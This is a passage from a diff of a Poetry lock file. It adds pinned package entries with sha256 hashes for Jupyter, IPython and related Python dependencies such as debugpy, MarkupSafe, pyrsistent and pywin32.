+ {file = "debugpy-1.4.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:8a2be4e5d696ad39be6c6c37dc580993d04aad7d893fd6e449e1a055d7b5dddb"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:d89ab3bd51d6a3f13b093bc3881a827d8f6c9588d9a493bddb3b47f9d078fd1d"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:f20a07ac5fb0deee9be1ad1a9a124d858a8b79c66c7ec5e1767d78aa964f86c4"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2014_i686.whl", hash = "sha256:6bb62615b3ad3d7202b7b7eb85f3d000aa17a61303af5f11eab048c91a1f30a6"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:a9f582203af34c6978bffaba77425662e949251998276e9dece113862e753459"},
+ {file = "debugpy-1.4.1-cp39-cp39-win32.whl", hash = "sha256:129312b01ec46ab303a8c0667d559a0de0bed1a394cc128039b6f008f1c376b7"},
+ {file = "debugpy-1.4.1-cp39-cp39-win_amd64.whl", hash = "sha256:1762908202b0b0b481ec44125edb625d136d16c4991d3a7c1310c85672ffe5ba"},
+ {file = "debugpy-1.4.1-py2.py3-none-any.whl", hash = "sha256:84ff51b8b5c847d5421324ca419db1eec813a4dd2bbf19dbbbe132e2ab2b2fc6"},
+ {file = "debugpy-1.4.1.zip", hash = "sha256:889316de0b8ff3732927cb058cfbd3371e4cd0002ecc170d34c755ad289c867c"},
+]
+decorator = [
+ {file = "decorator-5.0.9-py3-none-any.whl", hash = "sha256:6e5c199c16f7a9f0e3a61a4a54b3d27e7dad0dbdde92b944426cb20914376323"},
+ {file = "decorator-5.0.9.tar.gz", hash = "sha256:72ecfba4320a893c53f9706bebb2d55c270c1e51a28789361aa93e4a21319ed5"},
+]
+defusedxml = [
+ {file = "defusedxml-0.7.1-py2.py3-none-any.whl", hash = "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61"},
+ {file = "defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"},
+]
+entrypoints = [
+ {file = "entrypoints-0.3-py2.py3-none-any.whl", hash = "sha256:589f874b313739ad35be6e0cd7efde2a4e9b6fea91edcc34e58ecbb8dbe56d19"},
+ {file = "entrypoints-0.3.tar.gz", hash = "sha256:c70dd71abe5a8c85e55e12c19bd91ccfeec11a6e99044204511f9ed547d48451"},
+]
+idna = [
+ {file = "idna-3.2-py3-none-any.whl", hash = "sha256:14475042e284991034cb48e06f6851428fb14c4dc953acd9be9a5e95c7b6dd7a"},
+ {file = "idna-3.2.tar.gz", hash = "sha256:467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3"},
+]
+ipykernel = [
+ {file = "ipykernel-6.1.0-py3-none-any.whl", hash = "sha256:804202fb4a621dce163bf88ce2687c98450d7ed728ef1d17d6f5ed20744c6e02"},
+ {file = "ipykernel-6.1.0.tar.gz", hash = "sha256:e21a718c696ded7d4d5e25b13d2bdd88e099e782fd3be66f9d2e66397543d283"},
+]
+ipython = [
+ {file = "ipython-7.26.0-py3-none-any.whl", hash = "sha256:892743b65c21ed72b806a3a602cca408520b3200b89d1924f4b3d2cdb3692362"},
+ {file = "ipython-7.26.0.tar.gz", hash = "sha256:0cff04bb042800129348701f7bd68a430a844e8fb193979c08f6c99f28bb735e"},
+]
+ipython-genutils = [
+ {file = "ipython_genutils-0.2.0-py2.py3-none-any.whl", hash = "sha256:72dd37233799e619666c9f639a9da83c34013a73e8bbc79a7a6348d93c61fab8"},
+ {file = "ipython_genutils-0.2.0.tar.gz", hash = "sha256:eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"},
+]
isort = [
{file = "isort-5.9.3-py3-none-any.whl", hash = "sha256:e17d6e2b81095c9db0a03a8025a957f334d6ea30b26f9ec70805411e5c7c81f2"},
{file = "isort-5.9.3.tar.gz", hash = "sha256:9c2ea1e62d871267b78307fe511c0838ba0da28698c5732d54e2790bf3ba9899"},
]
+jedi = [
+ {file = "jedi-0.18.0-py2.py3-none-any.whl", hash = "sha256:18456d83f65f400ab0c2d3319e48520420ef43b23a086fdc05dff34132f0fb93"},
+ {file = "jedi-0.18.0.tar.gz", hash = "sha256:92550a404bad8afed881a137ec9a461fed49eca661414be45059329614ed0707"},
+]
+jinja2 = [
+ {file = "Jinja2-3.0.1-py3-none-any.whl", hash = "sha256:1f06f2da51e7b56b8f238affdd6b4e2c61e39598a378cc49345bc1bd42a978a4"},
+ {file = "Jinja2-3.0.1.tar.gz", hash = "sha256:703f484b47a6af502e743c9122595cc812b0271f661722403114f71a79d0f5a4"},
+]
+json5 = [
+ {file = "json5-0.9.6-py2.py3-none-any.whl", hash = "sha256:823e510eb355949bed817e1f3e2d682455dc6af9daf6066d5698d6a2ca4481c2"},
+ {file = "json5-0.9.6.tar.gz", hash = "sha256:9175ad1bc248e22bb8d95a8e8d765958bf0008fef2fe8abab5bc04e0f1ac8302"},
+]
+jsonschema = [
+ {file = "jsonschema-3.2.0-py2.py3-none-any.whl", hash = "sha256:4e5b3cf8216f577bee9ce139cbe72eca3ea4f292ec60928ff24758ce626cd163"},
+ {file = "jsonschema-3.2.0.tar.gz", hash = "sha256:c8a85b28d377cc7737e46e2d9f2b4f44ee3c0e1deac6bf46ddefc7187d30797a"},
+]
+jupyter-client = [
+ {file = "jupyter_client-6.2.0-py3-none-any.whl", hash = "sha256:9715152067e3f7ea3b56f341c9a0f9715c8c7cc316ee0eb13c3c84f5ca0065f5"},
+ {file = "jupyter_client-6.2.0.tar.gz", hash = "sha256:e2ab61d79fbf8b56734a4c2499f19830fbd7f6fefb3e87868ef0545cb3c17eb9"},
+]
+jupyter-core = [
+ {file = "jupyter_core-4.7.1-py3-none-any.whl", hash = "sha256:8c6c0cac5c1b563622ad49321d5ec47017bd18b94facb381c6973a0486395f8e"},
+ {file = "jupyter_core-4.7.1.tar.gz", hash = "sha256:79025cb3225efcd36847d0840f3fc672c0abd7afd0de83ba8a1d3837619122b4"},
+]
+jupyter-server = [
+ {file = "jupyter_server-1.10.2-py3-none-any.whl", hash = "sha256:491c920013144a2d6f5286ab4038df6a081b32352c9c8b928ec8af17eb2a5e10"},
+ {file = "jupyter_server-1.10.2.tar.gz", hash = "sha256:d3a3b68ebc6d7bfee1097f1712cf7709ee39c92379da2cc08724515bb85e72bf"},
+]
+jupyterlab = [
+ {file = "jupyterlab-3.1.6-py3-none-any.whl", hash = "sha256:0d224d56fbf2bae1fdd0f1958d617fabc9f81fa8875d46da19c89d747c89527a"},
+ {file = "jupyterlab-3.1.6.tar.gz", hash = "sha256:6d2ada6a333861f33a1b555d3cb7b07aa9d1ab80f07997b3d0c43878a98c1174"},
+]
+jupyterlab-pygments = [
+ {file = "jupyterlab_pygments-0.1.2-py2.py3-none-any.whl", hash = "sha256:abfb880fd1561987efaefcb2d2ac75145d2a5d0139b1876d5be806e32f630008"},
+ {file = "jupyterlab_pygments-0.1.2.tar.gz", hash = "sha256:cfcda0873626150932f438eccf0f8bf22bfa92345b814890ab360d666b254146"},
+]
+jupyterlab-server = [
+ {file = "jupyterlab_server-2.7.0-py3-none-any.whl", hash = "sha256:244c815578c2fdcd341f01635e77d9f112efcbc92ba299e8c6243f870c84c609"},
+ {file = "jupyterlab_server-2.7.0.tar.gz", hash = "sha256:31457ef564febc42043bc539356c804f6f9144f602e2852150bf0820ed6d7e18"},
+]
lazy-object-proxy = [
{file = "lazy-object-proxy-1.6.0.tar.gz", hash = "sha256:489000d368377571c6f982fba6497f2aa13c6d1facc40660963da62f5c379726"},
{file = "lazy_object_proxy-1.6.0-cp27-cp27m-macosx_10_14_x86_64.whl", hash = "sha256:c6938967f8528b3668622a9ed3b31d145fab161a32f5891ea7b84f6b790be05b"},
@@ -337,10 +1426,54 @@ lazy-object-proxy = [
{file = "lazy_object_proxy-1.6.0-cp39-cp39-win32.whl", hash = "sha256:1fee665d2638491f4d6e55bd483e15ef21f6c8c2095f235fef72601021e64f61"},
{file = "lazy_object_proxy-1.6.0-cp39-cp39-win_amd64.whl", hash = "sha256:f5144c75445ae3ca2057faac03fda5a902eff196702b0a24daf1d6ce0650514b"},
]
+markupsafe = [
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f9081981fe268bd86831e5c75f7de206ef275defcb82bc70740ae6dc507aee51"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:0955295dd5eec6cb6cc2fe1698f4c6d84af2e92de33fbcac4111913cd100a6ff"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:0446679737af14f45767963a1a9ef7620189912317d095f2d9ffa183a4d25d2b"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:f826e31d18b516f653fe296d967d700fddad5901ae07c622bb3705955e1faa94"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:fa130dd50c57d53368c9d59395cb5526eda596d3ffe36666cd81a44d56e48872"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:905fec760bd2fa1388bb5b489ee8ee5f7291d692638ea5f67982d968366bef9f"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-win32.whl", hash = "sha256:6c4ca60fa24e85fe25b912b01e62cb969d69a23a5d5867682dd3e80b5b02581d"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b2f4bf27480f5e5e8ce285a8c8fd176c0b03e93dcc6646477d4630e83440c6a9"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0717a7390a68be14b8c793ba258e075c6f4ca819f15edfc2a3a027c823718567"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:6557b31b5e2c9ddf0de32a691f2312a32f77cd7681d8af66c2692efdbef84c18"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:49e3ceeabbfb9d66c3aef5af3a60cc43b85c33df25ce03d0031a608b0a8b2e3f"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:d7f9850398e85aba693bb640262d3611788b1f29a79f0c93c565694658f4071f"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:6a7fae0dd14cf60ad5ff42baa2e95727c3d81ded453457771d02b7d2b3f9c0c2"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:b7f2d075102dc8c794cbde1947378051c4e5180d52d276987b8d28a3bd58c17d"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-win32.whl", hash = "sha256:a30e67a65b53ea0a5e62fe23682cfe22712e01f453b95233b25502f7c61cb415"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:611d1ad9a4288cf3e3c16014564df047fe08410e628f89805e475368bd304914"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:be98f628055368795d818ebf93da628541e10b75b41c559fdf36d104c5787066"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:1d609f577dc6e1aa17d746f8bd3c31aa4d258f4070d61b2aa5c4166c1539de35"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7d91275b0245b1da4d4cfa07e0faedd5b0812efc15b702576d103293e252af1b"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:01a9b8ea66f1658938f65b93a85ebe8bc016e6769611be228d797c9d998dd298"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:47ab1e7b91c098ab893b828deafa1203de86d0bc6ab587b160f78fe6c4011f75"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:97383d78eb34da7e1fa37dd273c20ad4320929af65d156e35a5e2d89566d9dfb"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-win32.whl", hash = "sha256:023cb26ec21ece8dc3907c0e8320058b2e0cb3c55cf9564da612bc325bed5e64"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:984d76483eb32f1bcb536dc27e4ad56bba4baa70be32fa87152832cdd9db0833"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:2ef54abee730b502252bcdf31b10dacb0a416229b72c18b19e24a4509f273d26"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3c112550557578c26af18a1ccc9e090bfe03832ae994343cfdacd287db6a6ae7"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:53edb4da6925ad13c07b6d26c2a852bd81e364f95301c66e930ab2aef5b5ddd8"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:f5653a225f31e113b152e56f154ccbe59eeb1c7487b39b9d9f9cdb58e6c79dc5"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:4efca8f86c54b22348a5467704e3fec767b2db12fc39c6d963168ab1d3fc9135"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:ab3ef638ace319fa26553db0624c4699e31a28bb2a835c5faca8f8acf6a5a902"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:f8ba0e8349a38d3001fae7eadded3f6606f0da5d748ee53cc1dab1d6527b9509"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-win32.whl", hash = "sha256:10f82115e21dc0dfec9ab5c0223652f7197feb168c940f3ef61563fc2d6beb74"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:693ce3f9e70a6cf7d2fb9e6c9d8b204b6b39897a2c4a1aa65728d5ac97dcc1d8"},
+ {file = "MarkupSafe-2.0.1.tar.gz", hash = "sha256:594c67807fb16238b30c44bdf74f36c02cdf22d1c8cda91ef8a0ed8dabf5620a"},
+]
+matplotlib-inline = [
+ {file = "matplotlib-inline-0.1.2.tar.gz", hash = "sha256:f41d5ff73c9f5385775d5c0bc13b424535c8402fe70ea8210f93e11f3683993e"},
+ {file = "matplotlib_inline-0.1.2-py3-none-any.whl", hash = "sha256:5cf1176f554abb4fa98cb362aa2b55c500147e4bdbb07e3fda359143e1da0811"},
+]
mccabe = [
{file = "mccabe-0.6.1-py2.py3-none-any.whl", hash = "sha256:ab8a6258860da4b6677da4bd2fe5dc2c659cff31b3ee4f7f5d64e79735b80d42"},
{file = "mccabe-0.6.1.tar.gz", hash = "sha256:dd8d182285a0fe56bace7f45b5e7d1a6ebcbf524e8f3bd87eb0f125271b8831f"},
]
+mistune = [
+ {file = "mistune-0.8.4-py2.py3-none-any.whl", hash = "sha256:88a1051873018da288eee8538d476dffe1262495144b33ecb586c4ab266bb8d4"},
+ {file = "mistune-0.8.4.tar.gz", hash = "sha256:59a3429db53c50b5c6bcc8a07f8848cb00d7dc8bdb431a4ab41920d201d4756e"},
+]
more-itertools = [
{file = "more-itertools-8.8.0.tar.gz", hash = "sha256:83f0308e05477c68f56ea3a888172c78ed5d5b3c282addb67508e7ba6c8f813a"},
{file = "more_itertools-8.8.0-py3-none-any.whl", hash = "sha256:2cf89ec599962f2ddc4d568a05defc40e0a587fbc10d5989713638864c36be4d"},
@@ -374,22 +1507,81 @@ mypy-extensions = [
{file = "mypy_extensions-0.4.3-py2.py3-none-any.whl", hash = "sha256:090fedd75945a69ae91ce1303b5824f428daf5a028d2f6ab8a299250a846f15d"},
{file = "mypy_extensions-0.4.3.tar.gz", hash = "sha256:2d82818f5bb3e369420cb3c4060a7970edba416647068eb4c5343488a6c604a8"},
]
+nbclassic = [
+ {file = "nbclassic-0.3.1-py3-none-any.whl", hash = "sha256:a7437c90a0bffcce172a4540cc53e140ea5987280c87c31a0cfa6e5d315eb907"},
+ {file = "nbclassic-0.3.1.tar.gz", hash = "sha256:f920f8d09849bea7950e1017ff3bd101763a8d68f565a51ce053572e65aa7947"},
+]
+nbclient = [
+ {file = "nbclient-0.5.3-py3-none-any.whl", hash = "sha256:e79437364a2376892b3f46bedbf9b444e5396cfb1bc366a472c37b48e9551500"},
+ {file = "nbclient-0.5.3.tar.gz", hash = "sha256:db17271330c68c8c88d46d72349e24c147bb6f34ec82d8481a8f025c4d26589c"},
+]
+nbconvert = [
+ {file = "nbconvert-6.1.0-py3-none-any.whl", hash = "sha256:37cd92ff2ae6a268e62075ff8b16129e0be4939c4dfcee53dc77cc8a7e06c684"},
+ {file = "nbconvert-6.1.0.tar.gz", hash = "sha256:d22a8ff202644d31db254d24d52c3a96c82156623fcd7c7f987bba2612303ec9"},
+]
+nbformat = [
+ {file = "nbformat-5.1.3-py3-none-any.whl", hash = "sha256:eb8447edd7127d043361bc17f2f5a807626bc8e878c7709a1c647abda28a9171"},
+ {file = "nbformat-5.1.3.tar.gz", hash = "sha256:b516788ad70771c6250977c1374fcca6edebe6126fd2adb5a69aa5c2356fd1c8"},
+]
+nest-asyncio = [
+ {file = "nest_asyncio-1.5.1-py3-none-any.whl", hash = "sha256:76d6e972265063fe92a90b9cc4fb82616e07d586b346ed9d2c89a4187acea39c"},
+ {file = "nest_asyncio-1.5.1.tar.gz", hash = "sha256:afc5a1c515210a23c461932765691ad39e8eba6551c055ac8d5546e69250d0aa"},
+]
+notebook = [
+ {file = "notebook-6.4.3-py3-none-any.whl", hash = "sha256:b50eafa8208d5db966efd1caa4076b4dfc51815e02a805b32ecd717e9e6cc071"},
+ {file = "notebook-6.4.3.tar.gz", hash = "sha256:e6b6dfed36b00cf950f63c0d42e947c101d4258aec21624de62b9e0c11ed5c0d"},
+]
packaging = [
{file = "packaging-21.0-py3-none-any.whl", hash = "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14"},
{file = "packaging-21.0.tar.gz", hash = "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7"},
]
+pandocfilters = [
+ {file = "pandocfilters-1.4.3.tar.gz", hash = "sha256:bc63fbb50534b4b1f8ebe1860889289e8af94a23bff7445259592df25a3906eb"},
+]
+parso = [
+ {file = "parso-0.8.2-py2.py3-none-any.whl", hash = "sha256:a8c4922db71e4fdb90e0d0bc6e50f9b273d3397925e5e60a717e719201778d22"},
+ {file = "parso-0.8.2.tar.gz", hash = "sha256:12b83492c6239ce32ff5eed6d3639d6a536170723c6f3f1506869f1ace413398"},
+]
pathspec = [
{file = "pathspec-0.9.0-py2.py3-none-any.whl", hash = "sha256:7d15c4ddb0b5c802d161efc417ec1a2558ea2653c2e8ad9c19098201dc1c993a"},
{file = "pathspec-0.9.0.tar.gz", hash = "sha256:e564499435a2673d586f6b2130bb5b95f04a3ba06f81b8f895b651a3c76aabb1"},
]
+pexpect = [
+ {file = "pexpect-4.8.0-py2.py3-none-any.whl", hash = "sha256:0b48a55dcb3c05f3329815901ea4fc1537514d6ba867a152b581d69ae3710937"},
+ {file = "pexpect-4.8.0.tar.gz", hash = "sha256:fc65a43959d153d0114afe13997d439c22823a27cefceb5ff35c2178c6784c0c"},
+]
+pickleshare = [
+ {file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"},
+ {file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"},
+]
pluggy = [
{file = "pluggy-0.13.1-py2.py3-none-any.whl", hash = "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d"},
{file = "pluggy-0.13.1.tar.gz", hash = "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0"},
]
+prometheus-client = [
+ {file = "prometheus_client-0.11.0-py2.py3-none-any.whl", hash = "sha256:b014bc76815eb1399da8ce5fc84b7717a3e63652b0c0f8804092c9363acab1b2"},
+ {file = "prometheus_client-0.11.0.tar.gz", hash = "sha256:3a8baade6cb80bcfe43297e33e7623f3118d660d41387593758e2fb1ea173a86"},
+]
+prompt-toolkit = [
+ {file = "prompt_toolkit-3.0.19-py3-none-any.whl", hash = "sha256:7089d8d2938043508aa9420ec18ce0922885304cddae87fb96eebca942299f88"},
+ {file = "prompt_toolkit-3.0.19.tar.gz", hash = "sha256:08360ee3a3148bdb5163621709ee322ec34fc4375099afa4bbf751e9b7b7fa4f"},
+]
+ptyprocess = [
+ {file = "ptyprocess-0.7.0-py2.py3-none-any.whl", hash = "sha256:4b41f3967fce3af57cc7e94b888626c18bf37a083e3651ca8feeb66d492fef35"},
+ {file = "ptyprocess-0.7.0.tar.gz", hash = "sha256:5c5d0a3b48ceee0b48485e0c26037c0acd7d29765ca3fbb5cb3831d347423220"},
+]
py = [
{file = "py-1.10.0-py2.py3-none-any.whl", hash = "sha256:3b80836aa6d1feeaa108e046da6423ab8f6ceda6468545ae8d02d9d58d18818a"},
{file = "py-1.10.0.tar.gz", hash = "sha256:21b81bda15b66ef5e1a777a21c4dcd9c20ad3efd0b3f817e7a809035269e1bd3"},
]
+pycparser = [
+ {file = "pycparser-2.20-py2.py3-none-any.whl", hash = "sha256:7582ad22678f0fcd81102833f60ef8d0e57288b6b5fb00323d101be910e35705"},
+ {file = "pycparser-2.20.tar.gz", hash = "sha256:2d475327684562c3a96cc71adf7dc8c4f0565175cf86b6d7a404ff4c771f15f0"},
+]
+pygments = [
+ {file = "Pygments-2.9.0-py3-none-any.whl", hash = "sha256:d66e804411278594d764fc69ec36ec13d9ae9147193a1740cd34d272ca383b8e"},
+ {file = "Pygments-2.9.0.tar.gz", hash = "sha256:a18f47b506a429f6f4b9df81bb02beab9ca21d0a5fee38ed15aef65f0545519f"},
+]
pylint = [
{file = "pylint-2.9.6-py3-none-any.whl", hash = "sha256:2e1a0eb2e8ab41d6b5dbada87f066492bb1557b12b76c47c2ee8aa8a11186594"},
{file = "pylint-2.9.6.tar.gz", hash = "sha256:8b838c8983ee1904b2de66cce9d0b96649a91901350e956d78f289c3bc87b48e"},
@@ -398,10 +1590,130 @@ pyparsing = [
{file = "pyparsing-2.4.7-py2.py3-none-any.whl", hash = "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b"},
{file = "pyparsing-2.4.7.tar.gz", hash = "sha256:c203ec8783bf771a155b207279b9bccb8dea02d8f0c9e5f8ead507bc3246ecc1"},
]
+pyrsistent = [
+ {file = "pyrsistent-0.18.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f4c8cabb46ff8e5d61f56a037974228e978f26bfefce4f61a4b1ac0ba7a2ab72"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:da6e5e818d18459fa46fac0a4a4e543507fe1110e808101277c5a2b5bab0cd2d"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:5e4395bbf841693eaebaa5bb5c8f5cdbb1d139e07c975c682ec4e4f8126e03d2"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-win32.whl", hash = "sha256:527be2bfa8dc80f6f8ddd65242ba476a6c4fb4e3aedbf281dfbac1b1ed4165b1"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-win_amd64.whl", hash = "sha256:2aaf19dc8ce517a8653746d98e962ef480ff34b6bc563fc067be6401ffb457c7"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:58a70d93fb79dc585b21f9d72487b929a6fe58da0754fa4cb9f279bb92369396"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:4916c10896721e472ee12c95cdc2891ce5890898d2f9907b1b4ae0f53588b710"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:73ff61b1411e3fb0ba144b8f08d6749749775fe89688093e1efef9839d2dcc35"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-win32.whl", hash = "sha256:b29b869cf58412ca5738d23691e96d8aff535e17390128a1a52717c9a109da4f"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-win_amd64.whl", hash = "sha256:097b96f129dd36a8c9e33594e7ebb151b1515eb52cceb08474c10a5479e799f2"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:772e94c2c6864f2cd2ffbe58bb3bdefbe2a32afa0acb1a77e472aac831f83427"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-manylinux1_i686.whl", hash = "sha256:c1a9ff320fa699337e05edcaae79ef8c2880b52720bc031b219e5b5008ebbdef"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:cd3caef37a415fd0dae6148a1b6957a8c5f275a62cca02e18474608cb263640c"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-win32.whl", hash = "sha256:e79d94ca58fcafef6395f6352383fa1a76922268fa02caa2272fff501c2fdc78"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-win_amd64.whl", hash = "sha256:a0c772d791c38bbc77be659af29bb14c38ced151433592e326361610250c605b"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d5ec194c9c573aafaceebf05fc400656722793dac57f254cd4741f3c27ae57b4"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-manylinux1_i686.whl", hash = "sha256:6b5eed00e597b5b5773b4ca30bd48a5774ef1e96f2a45d105db5b4ebb4bca680"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:48578680353f41dca1ca3dc48629fb77dfc745128b56fc01096b2530c13fd426"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-win32.whl", hash = "sha256:f3ef98d7b76da5eb19c37fda834d50262ff9167c65658d1d8f974d2e4d90676b"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-win_amd64.whl", hash = "sha256:404e1f1d254d314d55adb8d87f4f465c8693d6f902f67eb6ef5b4526dc58e6ea"},
+ {file = "pyrsistent-0.18.0.tar.gz", hash = "sha256:773c781216f8c2900b42a7b638d5b517bb134ae1acbebe4d1e8f1f41ea60eb4b"},
+]
pytest = [
{file = "pytest-5.4.3-py3-none-any.whl", hash = "sha256:5c0db86b698e8f170ba4582a492248919255fcd4c79b1ee64ace34301fb589a1"},
{file = "pytest-5.4.3.tar.gz", hash = "sha256:7979331bfcba207414f5e1263b5a0f8f521d0f457318836a7355531ed1a4c7d8"},
]
+python-dateutil = [
+ {file = "python-dateutil-2.8.2.tar.gz", hash = "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"},
+ {file = "python_dateutil-2.8.2-py2.py3-none-any.whl", hash = "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"},
+]
+pytz = [
+ {file = "pytz-2021.1-py2.py3-none-any.whl", hash = "sha256:eb10ce3e7736052ed3623d49975ce333bcd712c7bb19a58b9e2089d4057d0798"},
+ {file = "pytz-2021.1.tar.gz", hash = "sha256:83a4a90894bf38e243cf052c8b58f381bfe9a7a483f6a9cab140bc7f702ac4da"},
+]
+pywin32 = [
+ {file = "pywin32-301-cp35-cp35m-win32.whl", hash = "sha256:93367c96e3a76dfe5003d8291ae16454ca7d84bb24d721e0b74a07610b7be4a7"},
+ {file = "pywin32-301-cp35-cp35m-win_amd64.whl", hash = "sha256:9635df6998a70282bd36e7ac2a5cef9ead1627b0a63b17c731312c7a0daebb72"},
+ {file = "pywin32-301-cp36-cp36m-win32.whl", hash = "sha256:c866f04a182a8cb9b7855de065113bbd2e40524f570db73ef1ee99ff0a5cc2f0"},
+ {file = "pywin32-301-cp36-cp36m-win_amd64.whl", hash = "sha256:dafa18e95bf2a92f298fe9c582b0e205aca45c55f989937c52c454ce65b93c78"},
+ {file = "pywin32-301-cp37-cp37m-win32.whl", hash = "sha256:98f62a3f60aa64894a290fb7494bfa0bfa0a199e9e052e1ac293b2ad3cd2818b"},
+ {file = "pywin32-301-cp37-cp37m-win_amd64.whl", hash = "sha256:fb3b4933e0382ba49305cc6cd3fb18525df7fd96aa434de19ce0878133bf8e4a"},
+ {file = "pywin32-301-cp38-cp38-win32.whl", hash = "sha256:88981dd3cfb07432625b180f49bf4e179fb8cbb5704cd512e38dd63636af7a17"},
+ {file = "pywin32-301-cp38-cp38-win_amd64.whl", hash = "sha256:8c9d33968aa7fcddf44e47750e18f3d034c3e443a707688a008a2e52bbef7e96"},
+ {file = "pywin32-301-cp39-cp39-win32.whl", hash = "sha256:595d397df65f1b2e0beaca63a883ae6d8b6df1cdea85c16ae85f6d2e648133fe"},
+ {file = "pywin32-301-cp39-cp39-win_amd64.whl", hash = "sha256:87604a4087434cd814ad8973bd47d6524bd1fa9e971ce428e76b62a5e0860fdf"},
+]
+pywinpty = [
